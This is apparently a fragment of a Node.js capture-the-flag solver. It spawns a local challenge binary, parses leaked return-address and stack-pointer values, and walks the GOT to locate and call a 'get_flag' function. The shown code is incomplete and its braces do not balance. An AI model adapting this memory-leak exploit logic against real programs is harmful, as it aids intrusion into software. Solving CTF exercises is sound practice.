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Created November 19, 2023 23:43
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// README: writeup @
const readline = require("readline");
const {spawn} = require("child_process");
let rbp = null, retaddr = null;
let index = null;
let times = 0; // number of times we have seen 0x3d48--the first occurrence is not the real GOT
let times2 = 0; // our current offset within GOT
const nc = spawn("./a.out");
const rl = readline.createInterface({input: nc.stdout});
// read retaddr and RBP
rl.on("line", line => {
const match = line.match(/like (.+)$/);
if(match) {
const value = BigInt('0x' + match[1].split(" ").reverse().join(""));
if(!retaddr) {
retaddr = value & 0xfffffffffffffff8n; // align to 8 bytes
} else if(!rbp) {
rbp = value;
index = retaddr - rbp;
} else {
if(times == 2) {
if(times2 == 19) {
nc.stdin.write('get_flag is at 0x'+value.toString(16)+'\n');
if(value == 0x3d48n) {
if(index) {
nc.stdin.write(index + '\n');
index += 8n;
} else if(line.includes("the flag is")) {
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